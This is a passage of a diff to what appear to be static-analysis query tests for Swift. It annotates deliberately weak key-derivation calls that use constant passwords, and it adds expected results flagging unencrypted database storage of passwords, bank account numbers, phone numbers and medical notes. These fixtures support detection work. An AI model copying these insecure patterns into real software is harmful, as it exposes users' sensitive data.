keyLength: 0) // BAD // $ Alert + let pbkdf2b2 = PKCS5.PBKDF2(password: constantStringPassword, salt: randomArray, iterations: iterations, keyLength: 0) // BAD // $ Alert let pbkdf2g1 = PKCS5.PBKDF2(password: randomPassword, salt: 
randomArray, iterations: iterations, keyLength: 0) // GOOD // Scrypt test cases - let scryptb1 = Scrypt(password: constantPassword, salt: randomArray, dkLen: 64, N: 16384, r: 8, p: 1) // BAD - let scryptb2 = Scrypt(password: constantStringPassword, salt: randomArray, dkLen: 64, N: 16384, r: 8, p: 1) // BAD + let scryptb1 = Scrypt(password: constantPassword, salt: randomArray, dkLen: 64, N: 16384, r: 8, p: 1) // BAD // $ Alert + let scryptb2 = Scrypt(password: constantStringPassword, salt: randomArray, dkLen: 64, N: 16384, r: 8, p: 1) // BAD // $ Alert let scryptg1 = Scrypt(password: randomPassword, salt: randomArray, dkLen: 64, N: 16384, r: 8, p: 1) // GOOD } diff --git a/swift/ql/test/query-tests/Security/CWE-311/CleartextStorageDatabase.expected b/swift/ql/test/query-tests/Security/CWE-311/CleartextStorageDatabase.expected index 204e2486cc2f..e3517d648265 100644 --- a/swift/ql/test/query-tests/Security/CWE-311/CleartextStorageDatabase.expected +++ b/swift/ql/test/query-tests/Security/CWE-311/CleartextStorageDatabase.expected 
@@ -1,3 +1,143 @@ +#select +| SQLite.swift:123:17:123:17 | insertQuery | SQLite.swift:119:70:119:70 | mobilePhoneNumber | SQLite.swift:123:17:123:17 | insertQuery | This operation stores 'insertQuery' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:119:70:119:70 | mobilePhoneNumber | mobilePhoneNumber | +| SQLite.swift:124:17:124:17 | updateQuery | SQLite.swift:120:50:120:50 | mobilePhoneNumber | SQLite.swift:124:17:124:17 | updateQuery | This operation stores 'updateQuery' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:120:50:120:50 | mobilePhoneNumber | mobilePhoneNumber | +| SQLite.swift:127:21:127:21 | insertQuery | SQLite.swift:119:70:119:70 | mobilePhoneNumber | SQLite.swift:127:21:127:21 | insertQuery | This operation stores 'insertQuery' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:119:70:119:70 | mobilePhoneNumber | mobilePhoneNumber | +| SQLite.swift:128:21:128:21 | updateQuery | SQLite.swift:120:50:120:50 | mobilePhoneNumber | SQLite.swift:128:21:128:21 | updateQuery | This operation stores 'updateQuery' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:120:50:120:50 | mobilePhoneNumber | mobilePhoneNumber | +| SQLite.swift:131:17:131:17 | insertQuery | SQLite.swift:119:70:119:70 | mobilePhoneNumber | SQLite.swift:131:17:131:17 | insertQuery | This operation stores 'insertQuery' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:119:70:119:70 | mobilePhoneNumber | mobilePhoneNumber | +| SQLite.swift:132:17:132:17 | updateQuery | SQLite.swift:120:50:120:50 | mobilePhoneNumber | SQLite.swift:132:17:132:17 | updateQuery | This operation stores 'updateQuery' in a database. It may contain unencrypted sensitive data from $@. 
| SQLite.swift:120:50:120:50 | mobilePhoneNumber | mobilePhoneNumber | +| SQLite.swift:135:20:135:20 | insertQuery | SQLite.swift:119:70:119:70 | mobilePhoneNumber | SQLite.swift:135:20:135:20 | insertQuery | This operation stores 'insertQuery' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:119:70:119:70 | mobilePhoneNumber | mobilePhoneNumber | +| SQLite.swift:136:20:136:20 | updateQuery | SQLite.swift:120:50:120:50 | mobilePhoneNumber | SQLite.swift:136:20:136:20 | updateQuery | This operation stores 'updateQuery' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:120:50:120:50 | mobilePhoneNumber | mobilePhoneNumber | +| SQLite.swift:139:24:139:24 | insertQuery | SQLite.swift:119:70:119:70 | mobilePhoneNumber | SQLite.swift:139:24:139:24 | insertQuery | This operation stores 'insertQuery' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:119:70:119:70 | mobilePhoneNumber | mobilePhoneNumber | +| SQLite.swift:140:24:140:24 | updateQuery | SQLite.swift:120:50:120:50 | mobilePhoneNumber | SQLite.swift:140:24:140:24 | updateQuery | This operation stores 'updateQuery' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:120:50:120:50 | mobilePhoneNumber | mobilePhoneNumber | +| SQLite.swift:147:32:147:32 | [...] | SQLite.swift:147:32:147:32 | mobilePhoneNumber | SQLite.swift:147:32:147:32 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:147:32:147:32 | mobilePhoneNumber | mobilePhoneNumber | +| SQLite.swift:148:28:148:28 | [...] | SQLite.swift:148:28:148:28 | mobilePhoneNumber | SQLite.swift:148:28:148:28 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:148:28:148:28 | mobilePhoneNumber | mobilePhoneNumber | +| SQLite.swift:149:31:149:31 | [...] 
| SQLite.swift:149:31:149:31 | mobilePhoneNumber | SQLite.swift:149:31:149:31 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:149:31:149:31 | mobilePhoneNumber | mobilePhoneNumber | +| SQLite.swift:152:21:152:21 | [...] | SQLite.swift:152:21:152:21 | mobilePhoneNumber | SQLite.swift:152:21:152:21 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:152:21:152:21 | mobilePhoneNumber | mobilePhoneNumber | +| SQLite.swift:153:20:153:20 | [...] | SQLite.swift:153:20:153:20 | mobilePhoneNumber | SQLite.swift:153:20:153:20 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:153:20:153:20 | mobilePhoneNumber | mobilePhoneNumber | +| SQLite.swift:154:23:154:23 | [...] | SQLite.swift:154:23:154:23 | mobilePhoneNumber | SQLite.swift:154:23:154:23 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:154:23:154:23 | mobilePhoneNumber | mobilePhoneNumber | +| SQLite.swift:158:32:158:54 | [...] | SQLite.swift:158:33:158:33 | mobilePhoneNumber | SQLite.swift:158:32:158:54 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:158:33:158:33 | mobilePhoneNumber | mobilePhoneNumber | +| SQLite.swift:159:28:159:50 | [...] | SQLite.swift:159:29:159:29 | mobilePhoneNumber | SQLite.swift:159:28:159:50 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:159:29:159:29 | mobilePhoneNumber | mobilePhoneNumber | +| SQLite.swift:160:31:160:53 | [...] | SQLite.swift:160:32:160:32 | mobilePhoneNumber | SQLite.swift:160:31:160:53 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. 
| SQLite.swift:160:32:160:32 | mobilePhoneNumber | mobilePhoneNumber | +| SQLite.swift:163:21:163:43 | [...] | SQLite.swift:163:22:163:22 | mobilePhoneNumber | SQLite.swift:163:21:163:43 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:163:22:163:22 | mobilePhoneNumber | mobilePhoneNumber | +| SQLite.swift:164:20:164:42 | [...] | SQLite.swift:164:21:164:21 | mobilePhoneNumber | SQLite.swift:164:20:164:42 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:164:21:164:21 | mobilePhoneNumber | mobilePhoneNumber | +| SQLite.swift:165:23:165:45 | [...] | SQLite.swift:165:24:165:24 | mobilePhoneNumber | SQLite.swift:165:23:165:45 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:165:24:165:24 | mobilePhoneNumber | mobilePhoneNumber | +| SQLite.swift:169:32:169:70 | [...] | SQLite.swift:169:53:169:53 | mobilePhoneNumber | SQLite.swift:169:32:169:70 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:169:53:169:53 | mobilePhoneNumber | mobilePhoneNumber | +| SQLite.swift:170:28:170:66 | [...] | SQLite.swift:170:49:170:49 | mobilePhoneNumber | SQLite.swift:170:28:170:66 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:170:49:170:49 | mobilePhoneNumber | mobilePhoneNumber | +| SQLite.swift:171:31:171:69 | [...] | SQLite.swift:171:52:171:52 | mobilePhoneNumber | SQLite.swift:171:31:171:69 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:171:52:171:52 | mobilePhoneNumber | mobilePhoneNumber | +| SQLite.swift:174:21:174:59 | [...] | SQLite.swift:174:42:174:42 | mobilePhoneNumber | SQLite.swift:174:21:174:59 | [...] | This operation stores '[...]' in a database. 
It may contain unencrypted sensitive data from $@. | SQLite.swift:174:42:174:42 | mobilePhoneNumber | mobilePhoneNumber | +| SQLite.swift:175:20:175:58 | [...] | SQLite.swift:175:41:175:41 | mobilePhoneNumber | SQLite.swift:175:20:175:58 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:175:41:175:41 | mobilePhoneNumber | mobilePhoneNumber | +| SQLite.swift:176:23:176:61 | [...] | SQLite.swift:176:44:176:44 | mobilePhoneNumber | SQLite.swift:176:23:176:61 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:176:44:176:44 | mobilePhoneNumber | mobilePhoneNumber | +| SQLite.swift:186:40:186:54 | [...] | SQLite.swift:186:54:186:54 | mobilePhoneNumber | SQLite.swift:186:40:186:54 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:186:54:186:54 | mobilePhoneNumber | mobilePhoneNumber | +| SQLite.swift:189:26:189:40 | [...] | SQLite.swift:189:40:189:40 | mobilePhoneNumber | SQLite.swift:189:26:189:40 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:189:40:189:40 | mobilePhoneNumber | mobilePhoneNumber | +| SQLite.swift:191:27:191:41 | [...] | SQLite.swift:191:41:191:41 | mobilePhoneNumber | SQLite.swift:191:27:191:41 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:191:41:191:41 | mobilePhoneNumber | mobilePhoneNumber | +| SQLite.swift:193:26:193:89 | [...] | SQLite.swift:193:72:193:72 | mobilePhoneNumber | SQLite.swift:193:26:193:89 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. 
| SQLite.swift:193:72:193:72 | mobilePhoneNumber | mobilePhoneNumber | +| SQLite.swift:199:30:199:30 | badMany | SQLite.swift:197:32:197:32 | mobilePhoneNumber | SQLite.swift:199:30:199:30 | badMany | This operation stores 'badMany' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:197:32:197:32 | mobilePhoneNumber | mobilePhoneNumber | +| SQLite.swift:201:54:201:54 | badMany | SQLite.swift:197:32:197:32 | mobilePhoneNumber | SQLite.swift:201:54:201:54 | badMany | This operation stores 'badMany' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:197:32:197:32 | mobilePhoneNumber | mobilePhoneNumber | +| sqlite3_c_api.swift:46:27:46:27 | insertQuery | sqlite3_c_api.swift:42:69:42:69 | medicalNotes | sqlite3_c_api.swift:46:27:46:27 | insertQuery | This operation stores 'insertQuery' in a database. It may contain unencrypted sensitive data from $@. | sqlite3_c_api.swift:42:69:42:69 | medicalNotes | medicalNotes | +| sqlite3_c_api.swift:47:27:47:27 | updateQuery | sqlite3_c_api.swift:43:49:43:49 | medicalNotes | sqlite3_c_api.swift:47:27:47:27 | updateQuery | This operation stores 'updateQuery' in a database. It may contain unencrypted sensitive data from $@. | sqlite3_c_api.swift:43:49:43:49 | medicalNotes | medicalNotes | +| sqlite3_c_api.swift:58:36:58:36 | medicalNotes | sqlite3_c_api.swift:58:36:58:36 | medicalNotes | sqlite3_c_api.swift:58:36:58:36 | medicalNotes | This operation stores 'medicalNotes' in a database. It may contain unencrypted sensitive data from $@. | sqlite3_c_api.swift:58:36:58:36 | medicalNotes | medicalNotes | +| testCoreData2.swift:37:2:37:2 | obj | testCoreData2.swift:37:16:37:16 | bankAccountNo | testCoreData2.swift:37:2:37:2 | [post] obj | This operation stores 'obj' in a database. It may contain unencrypted sensitive data from $@. 
| testCoreData2.swift:37:16:37:16 | bankAccountNo | bankAccountNo | +| testCoreData2.swift:39:2:39:2 | obj | testCoreData2.swift:39:28:39:28 | bankAccountNo | testCoreData2.swift:39:2:39:2 | [post] obj | This operation stores 'obj' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:39:28:39:28 | bankAccountNo | bankAccountNo | +| testCoreData2.swift:41:2:41:2 | obj | testCoreData2.swift:41:29:41:29 | bankAccountNo | testCoreData2.swift:41:2:41:2 | [post] obj | This operation stores 'obj' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:41:29:41:29 | bankAccountNo | bankAccountNo | +| testCoreData2.swift:43:2:43:2 | obj | testCoreData2.swift:43:35:43:35 | bankAccountNo | testCoreData2.swift:43:2:43:2 | [post] obj | This operation stores 'obj' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:43:35:43:35 | bankAccountNo | bankAccountNo | +| testCoreData2.swift:46:2:46:10 | ...? | testCoreData2.swift:46:22:46:22 | bankAccountNo | testCoreData2.swift:46:2:46:10 | [post] ...? | This operation stores '...?' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:46:22:46:22 | bankAccountNo | bankAccountNo | +| testCoreData2.swift:48:2:48:10 | ...? | testCoreData2.swift:48:34:48:34 | bankAccountNo | testCoreData2.swift:48:2:48:10 | [post] ...? | This operation stores '...?' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:48:34:48:34 | bankAccountNo | bankAccountNo | +| testCoreData2.swift:50:2:50:10 | ...? | testCoreData2.swift:50:35:50:35 | bankAccountNo | testCoreData2.swift:50:2:50:10 | [post] ...? | This operation stores '...?' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:50:35:50:35 | bankAccountNo | bankAccountNo | +| testCoreData2.swift:52:2:52:10 | ...? 
| testCoreData2.swift:52:41:52:41 | bankAccountNo | testCoreData2.swift:52:2:52:10 | [post] ...? | This operation stores '...?' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:52:41:52:41 | bankAccountNo | bankAccountNo | +| testCoreData2.swift:57:3:57:3 | obj | testCoreData2.swift:57:29:57:29 | bankAccountNo | testCoreData2.swift:57:3:57:3 | [post] obj | This operation stores 'obj' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:57:29:57:29 | bankAccountNo | bankAccountNo | +| testCoreData2.swift:60:4:60:4 | obj | testCoreData2.swift:60:30:60:30 | bankAccountNo | testCoreData2.swift:60:4:60:4 | [post] obj | This operation stores 'obj' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:60:30:60:30 | bankAccountNo | bankAccountNo | +| testCoreData2.swift:62:4:62:4 | obj | testCoreData2.swift:62:30:62:30 | bankAccountNo | testCoreData2.swift:62:4:62:4 | [post] obj | This operation stores 'obj' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:62:30:62:30 | bankAccountNo | bankAccountNo | +| testCoreData2.swift:65:3:65:3 | obj | testCoreData2.swift:65:29:65:29 | bankAccountNo | testCoreData2.swift:65:3:65:3 | [post] obj | This operation stores 'obj' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:65:29:65:29 | bankAccountNo | bankAccountNo | +| testCoreData2.swift:79:2:79:2 | dbObj | testCoreData2.swift:79:18:79:28 | .bankAccountNo | testCoreData2.swift:79:2:79:2 | [post] dbObj | This operation stores 'dbObj' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:79:18:79:28 | .bankAccountNo | .bankAccountNo | +| testCoreData2.swift:80:2:80:2 | dbObj | testCoreData2.swift:80:18:80:28 | .bankAccountNo2 | testCoreData2.swift:80:2:80:2 | [post] dbObj | This operation stores 'dbObj' in a database. It may contain unencrypted sensitive data from $@. 
| testCoreData2.swift:80:18:80:28 | .bankAccountNo2 | .bankAccountNo2 | +| testCoreData2.swift:82:2:82:2 | dbObj | testCoreData2.swift:82:18:82:18 | bankAccountNo | testCoreData2.swift:82:2:82:2 | [post] dbObj | This operation stores 'dbObj' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:82:18:82:18 | bankAccountNo | bankAccountNo | +| testCoreData2.swift:83:2:83:2 | dbObj | testCoreData2.swift:83:18:83:18 | bankAccountNo | testCoreData2.swift:83:2:83:2 | [post] dbObj | This operation stores 'dbObj' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:83:18:83:18 | bankAccountNo | bankAccountNo | +| testCoreData2.swift:84:2:84:2 | dbObj | testCoreData2.swift:84:18:84:18 | bankAccountNo2 | testCoreData2.swift:84:2:84:2 | [post] dbObj | This operation stores 'dbObj' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:84:18:84:18 | bankAccountNo2 | bankAccountNo2 | +| testCoreData2.swift:85:2:85:2 | dbObj | testCoreData2.swift:85:18:85:18 | bankAccountNo2 | testCoreData2.swift:85:2:85:2 | [post] dbObj | This operation stores 'dbObj' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:85:18:85:18 | bankAccountNo2 | bankAccountNo2 | +| testCoreData2.swift:87:2:87:10 | ...? | testCoreData2.swift:87:22:87:32 | .bankAccountNo | testCoreData2.swift:87:2:87:10 | [post] ...? | This operation stores '...?' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:87:22:87:32 | .bankAccountNo | .bankAccountNo | +| testCoreData2.swift:88:2:88:10 | ...? | testCoreData2.swift:88:22:88:22 | bankAccountNo | testCoreData2.swift:88:2:88:10 | [post] ...? | This operation stores '...?' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:88:22:88:22 | bankAccountNo | bankAccountNo | +| testCoreData2.swift:89:2:89:10 | ...? 
| testCoreData2.swift:89:22:89:22 | bankAccountNo2 | testCoreData2.swift:89:2:89:10 | [post] ...? | This operation stores '...?' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:89:22:89:22 | bankAccountNo2 | bankAccountNo2 | +| testCoreData2.swift:93:2:93:2 | dbObj | testCoreData2.swift:91:10:91:10 | bankAccountNo | testCoreData2.swift:93:2:93:2 | [post] dbObj | This operation stores 'dbObj' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:91:10:91:10 | bankAccountNo | bankAccountNo | +| testCoreData2.swift:98:2:98:2 | dbObj | testCoreData2.swift:95:10:95:10 | bankAccountNo | testCoreData2.swift:98:2:98:2 | [post] dbObj | This operation stores 'dbObj' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:95:10:95:10 | bankAccountNo | bankAccountNo | +| testCoreData2.swift:104:2:104:2 | dbObj | testCoreData2.swift:101:10:101:10 | bankAccountNo | testCoreData2.swift:104:2:104:2 | [post] dbObj | This operation stores 'dbObj' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:101:10:101:10 | bankAccountNo | bankAccountNo | +| testCoreData2.swift:105:2:105:2 | dbObj | testCoreData2.swift:101:10:101:10 | bankAccountNo | testCoreData2.swift:105:2:105:2 | [post] dbObj | This operation stores 'dbObj' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:101:10:101:10 | bankAccountNo | bankAccountNo | +| testCoreData.swift:19:12:19:12 | value | testCoreData.swift:61:25:61:25 | password | testCoreData.swift:19:12:19:12 | value | This operation stores 'value' in a database. It may contain unencrypted sensitive data from $@. | testCoreData.swift:61:25:61:25 | password | password | +| testCoreData.swift:32:13:32:13 | newValue | testCoreData.swift:64:16:64:16 | password | testCoreData.swift:32:13:32:13 | newValue | This operation stores 'newValue' in a database. 
It may contain unencrypted sensitive data from $@. | testCoreData.swift:64:16:64:16 | password | password | +| testCoreData.swift:48:15:48:15 | password | testCoreData.swift:48:15:48:15 | password | testCoreData.swift:48:15:48:15 | password | This operation stores 'password' in a database. It may contain unencrypted sensitive data from $@. | testCoreData.swift:48:15:48:15 | password | password | +| testCoreData.swift:51:24:51:24 | password | testCoreData.swift:51:24:51:24 | password | testCoreData.swift:51:24:51:24 | password | This operation stores 'password' in a database. It may contain unencrypted sensitive data from $@. | testCoreData.swift:51:24:51:24 | password | password | +| testCoreData.swift:58:15:58:15 | password | testCoreData.swift:58:15:58:15 | password | testCoreData.swift:58:15:58:15 | password | This operation stores 'password' in a database. It may contain unencrypted sensitive data from $@. | testCoreData.swift:58:15:58:15 | password | password | +| testCoreData.swift:64:2:64:2 | obj | testCoreData.swift:64:16:64:16 | password | testCoreData.swift:64:2:64:2 | [post] obj | This operation stores 'obj' in a database. It may contain unencrypted sensitive data from $@. | testCoreData.swift:64:16:64:16 | password | password | +| testCoreData.swift:78:15:78:15 | x | testCoreData.swift:77:24:77:24 | x | testCoreData.swift:78:15:78:15 | x | This operation stores 'x' in a database. It may contain unencrypted sensitive data from $@. | testCoreData.swift:77:24:77:24 | x | x | +| testCoreData.swift:81:15:81:15 | y | testCoreData.swift:80:10:80:22 | call to getPassword() | testCoreData.swift:81:15:81:15 | y | This operation stores 'y' in a database. It may contain unencrypted sensitive data from $@. 
| testCoreData.swift:80:10:80:22 | call to getPassword() | call to getPassword() | +| testCoreData.swift:85:15:85:17 | .password | testCoreData.swift:85:15:85:17 | .password | testCoreData.swift:85:15:85:17 | .password | This operation stores '.password' in a database. It may contain unencrypted sensitive data from $@. | testCoreData.swift:85:15:85:17 | .password | .password | +| testCoreData.swift:95:15:95:15 | x | testCoreData.swift:91:10:91:10 | passwd | testCoreData.swift:95:15:95:15 | x | This operation stores 'x' in a database. It may contain unencrypted sensitive data from $@. | testCoreData.swift:91:10:91:10 | passwd | passwd | +| testCoreData.swift:96:15:96:15 | y | testCoreData.swift:92:10:92:10 | passwd | testCoreData.swift:96:15:96:15 | y | This operation stores 'y' in a database. It may contain unencrypted sensitive data from $@. | testCoreData.swift:92:10:92:10 | passwd | passwd | +| testCoreData.swift:97:15:97:15 | z | testCoreData.swift:93:10:93:10 | passwd | testCoreData.swift:97:15:97:15 | z | This operation stores 'z' in a database. It may contain unencrypted sensitive data from $@. | testCoreData.swift:93:10:93:10 | passwd | passwd | +| testCoreData.swift:128:15:128:33 | call to generateSecretKey() | testCoreData.swift:128:15:128:33 | call to generateSecretKey() | testCoreData.swift:128:15:128:33 | call to generateSecretKey() | This operation stores 'call to generateSecretKey()' in a database. It may contain unencrypted sensitive data from $@. | testCoreData.swift:128:15:128:33 | call to generateSecretKey() | call to generateSecretKey() | +| testCoreData.swift:129:15:129:30 | call to getCertificate() | testCoreData.swift:129:15:129:30 | call to getCertificate() | testCoreData.swift:129:15:129:30 | call to getCertificate() | This operation stores 'call to getCertificate()' in a database. It may contain unencrypted sensitive data from $@. 
| testCoreData.swift:129:15:129:30 | call to getCertificate() | call to getCertificate() | +| testGRDB.swift:73:56:73:65 | [...] | testGRDB.swift:73:57:73:57 | password | testGRDB.swift:73:56:73:65 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:73:57:73:57 | password | password | +| testGRDB.swift:76:42:76:51 | [...] | testGRDB.swift:76:43:76:43 | password | testGRDB.swift:76:42:76:51 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:76:43:76:43 | password | password | +| testGRDB.swift:81:44:81:53 | [...] | testGRDB.swift:81:45:81:45 | password | testGRDB.swift:81:44:81:53 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:81:45:81:45 | password | password | +| testGRDB.swift:83:44:83:53 | [...] | testGRDB.swift:83:45:83:45 | password | testGRDB.swift:83:44:83:53 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:83:45:83:45 | password | password | +| testGRDB.swift:85:44:85:53 | [...] | testGRDB.swift:85:45:85:45 | password | testGRDB.swift:85:44:85:53 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:85:45:85:45 | password | password | +| testGRDB.swift:87:44:87:53 | [...] | testGRDB.swift:87:45:87:45 | password | testGRDB.swift:87:44:87:53 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:87:45:87:45 | password | password | +| testGRDB.swift:92:37:92:46 | [...] | testGRDB.swift:92:38:92:38 | password | testGRDB.swift:92:37:92:46 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:92:38:92:38 | password | password | +| testGRDB.swift:95:36:95:45 | [...] 
| testGRDB.swift:95:37:95:37 | password | testGRDB.swift:95:36:95:45 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:95:37:95:37 | password | password | +| testGRDB.swift:100:72:100:81 | [...] | testGRDB.swift:100:73:100:73 | password | testGRDB.swift:100:72:100:81 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:100:73:100:73 | password | password | +| testGRDB.swift:101:72:101:81 | [...] | testGRDB.swift:101:73:101:73 | password | testGRDB.swift:101:72:101:81 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:101:73:101:73 | password | password | +| testGRDB.swift:107:52:107:61 | [...] | testGRDB.swift:107:53:107:53 | password | testGRDB.swift:107:52:107:61 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:107:53:107:53 | password | password | +| testGRDB.swift:109:52:109:61 | [...] | testGRDB.swift:109:53:109:53 | password | testGRDB.swift:109:52:109:61 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:109:53:109:53 | password | password | +| testGRDB.swift:111:51:111:60 | [...] | testGRDB.swift:111:52:111:52 | password | testGRDB.swift:111:51:111:60 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:111:52:111:52 | password | password | +| testGRDB.swift:116:47:116:56 | [...] | testGRDB.swift:116:48:116:48 | password | testGRDB.swift:116:47:116:56 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:116:48:116:48 | password | password | +| testGRDB.swift:118:47:118:56 | [...] | testGRDB.swift:118:48:118:48 | password | testGRDB.swift:118:47:118:56 | [...] 
| This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:118:48:118:48 | password | password | +| testGRDB.swift:121:44:121:53 | [...] | testGRDB.swift:121:45:121:45 | password | testGRDB.swift:121:44:121:53 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:121:45:121:45 | password | password | +| testGRDB.swift:123:44:123:53 | [...] | testGRDB.swift:123:45:123:45 | password | testGRDB.swift:123:44:123:53 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:123:45:123:45 | password | password | +| testGRDB.swift:126:44:126:53 | [...] | testGRDB.swift:126:45:126:45 | password | testGRDB.swift:126:44:126:53 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:126:45:126:45 | password | password | +| testGRDB.swift:128:44:128:53 | [...] | testGRDB.swift:128:45:128:45 | password | testGRDB.swift:128:44:128:53 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:128:45:128:45 | password | password | +| testGRDB.swift:131:44:131:53 | [...] | testGRDB.swift:131:45:131:45 | password | testGRDB.swift:131:44:131:53 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:131:45:131:45 | password | password | +| testGRDB.swift:133:44:133:53 | [...] | testGRDB.swift:133:45:133:45 | password | testGRDB.swift:133:44:133:53 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:133:45:133:45 | password | password | +| testGRDB.swift:138:68:138:77 | [...] | testGRDB.swift:138:69:138:69 | password | testGRDB.swift:138:68:138:77 | [...] | This operation stores '[...]' in a database. 
It may contain unencrypted sensitive data from $@. | testGRDB.swift:138:69:138:69 | password | password | +| testGRDB.swift:140:68:140:77 | [...] | testGRDB.swift:140:69:140:69 | password | testGRDB.swift:140:68:140:77 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:140:69:140:69 | password | password | +| testGRDB.swift:143:65:143:74 | [...] | testGRDB.swift:143:66:143:66 | password | testGRDB.swift:143:65:143:74 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:143:66:143:66 | password | password | +| testGRDB.swift:145:65:145:74 | [...] | testGRDB.swift:145:66:145:66 | password | testGRDB.swift:145:65:145:74 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:145:66:145:66 | password | password | +| testGRDB.swift:148:65:148:74 | [...] | testGRDB.swift:148:66:148:66 | password | testGRDB.swift:148:65:148:74 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:148:66:148:66 | password | password | +| testGRDB.swift:150:65:150:74 | [...] | testGRDB.swift:150:66:150:66 | password | testGRDB.swift:150:65:150:74 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:150:66:150:66 | password | password | +| testGRDB.swift:153:65:153:74 | [...] | testGRDB.swift:153:66:153:66 | password | testGRDB.swift:153:65:153:74 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | 